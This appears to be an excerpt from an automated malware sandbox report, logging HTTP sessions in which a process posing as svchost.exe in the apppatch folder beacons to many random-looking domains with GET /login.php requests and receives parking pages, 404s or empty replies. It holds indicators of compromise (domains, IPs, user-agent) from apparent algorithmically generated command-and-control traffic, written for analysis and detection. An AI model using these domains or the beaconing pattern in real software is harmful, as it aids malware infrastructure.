                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.871067047 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          26192.168.2.84973664.190.63.136801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.096453905 CET348OUTGET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721149921 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kFstV9mNkok77JXzPm2+LYY2u3fcBlH+WgCWFAgfJC4qpbyQ9UHZbK0ZHMtbCnOsnq2NU/L5q6ydAOMWSPRJyg==
                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7596689c44-prw7b
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6b 46 73 74 56 39 6d 4e 6b 6f 6b 37 37 4a 58 7a 50 6d 32 2b 4c 59 59 32 75 33 66 63 42 6c 48 2b 57 67 43 57 46 41 67 66 4a 43 34 71 70 62 79 51 39 55 48 5a 62 4b 30 5a 48 4d 74 62 43 6e 4f 73 6e 71 32 4e 55 2f 4c 35 71 36 79 64 41 4f 4d 57 53 50 52 4a 79 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: 308<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kFstV9mNkok77JXzPm2+LYY2u3fcBlH+WgCWFAgfJC4qpbyQ9UHZbK0ZHMtbCnOsnq2NU/L5q6ydAOMWSPRJyg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721231937 CET212INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                          Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you 570are searching for!"><link
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721242905 CET1236INData Raw: 20 20 20 20 72 65 6c 3d 22 69 63 6f 6e 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61
                                                                                                                                                                                                          Data Ascii: rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721307039 CET1236INData Raw: 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74
                                                                                                                                                                                                          Data Ascii: n:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webk15D8it-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721314907 CET1236INData Raw: 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 7b
                                                                                                                                                                                                          Data Ascii: 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inl
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721333981 CET1236INData Raw: 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61
                                                                                                                                                                                                          Data Ascii: _content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{fon
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721364021 CET1236INData Raw: 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33
                                                                                                                                                                                                          Data Ascii: ttom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721371889 CET1060INData Raw: 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                                                                                                                                                                                                          Data Ascii: -color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--seco
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721395969 CET1236INData Raw: 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61
                                                                                                                                                                                                          Data Ascii: m:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.721406937 CET1236INData Raw: 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74
                                                                                                                                                                                                          Data Ascii: form:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.726254940 CET1236INData Raw: 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f
                                                                                                                                                                                                          Data Ascii: ter}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          27192.168.2.849737199.59.243.227801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.421536922 CET350OUTGET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.873805046 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1230
                                                                                                                                                                                                          x-request-id: a5572c25-6032-467b-b015-10575c4e4ea5
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u9Ug286W4Xj/jnzTjTUeKhYi7HXj52Ps61Cz7giKm0Jf2EPzSGemCX98HmK5Y/L/skqAu+Wqjo9JnyRRikdu8w==
                                                                                                                                                                                                          set-cookie: parking_session=a5572c25-6032-467b-b015-10575c4e4ea5; expires=Mon, 11 Nov 2024 17:39:17 GMT; path=/
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 39 55 67 32 38 36 57 34 58 6a 2f 6a 6e 7a 54 6a 54 55 65 4b 68 59 69 37 48 58 6a 35 32 50 73 36 31 43 7a 37 67 69 4b 6d 30 4a 66 32 45 50 7a 53 47 65 6d 43 58 39 38 48 6d 4b 35 59 2f 4c 2f 73 6b 71 41 75 2b 57 71 6a 6f 39 4a 6e 79 52 52 69 6b 64 75 38 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u9Ug286W4Xj/jnzTjTUeKhYi7HXj52Ps61Cz7giKm0Jf2EPzSGemCX98HmK5Y/L/skqAu+Wqjo9JnyRRikdu8w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.873831987 CET664INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTU1NzJjMjUtNjAzMi00NjdiLWIwMTUtMTA1NzVjNGU0ZWE1IiwicGFnZV90aW1lIjoxNzMxMzQ1ODU3LCJwYWdlX3VybCI6I


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          28192.168.2.84973964.225.91.73801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.367106915 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyhyg.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.913028002 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:18 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          29192.168.2.84974172.52.179.174801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.589803934 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          30192.168.2.84974272.52.179.174801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.121463060 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          31192.168.2.85359852.34.198.22980
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.955452919 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygyvuj.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.641503096 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:22 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=5fa3d5393dc8155eea2e62ba2018e8a3|66.23.206.109|1731345862|1731345862|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          32192.168.2.85935744.221.84.105801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.964730024 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyhiz.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.392695904 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:25 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=9da7769b195a1202f359e138b28cbd50|66.23.206.109|1731345865|1731345865|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          33192.168.2.863205199.59.243.227801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.854317904 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
                                                                                                                                                                                                          Cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368000031 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:26 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1094
                                                                                                                                                                                                          x-request-id: 3f096185-671b-4a18-b6f2-0a3f12916379
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                          set-cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679; expires=Mon, 11 Nov 2024 17:39:27 GMT
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
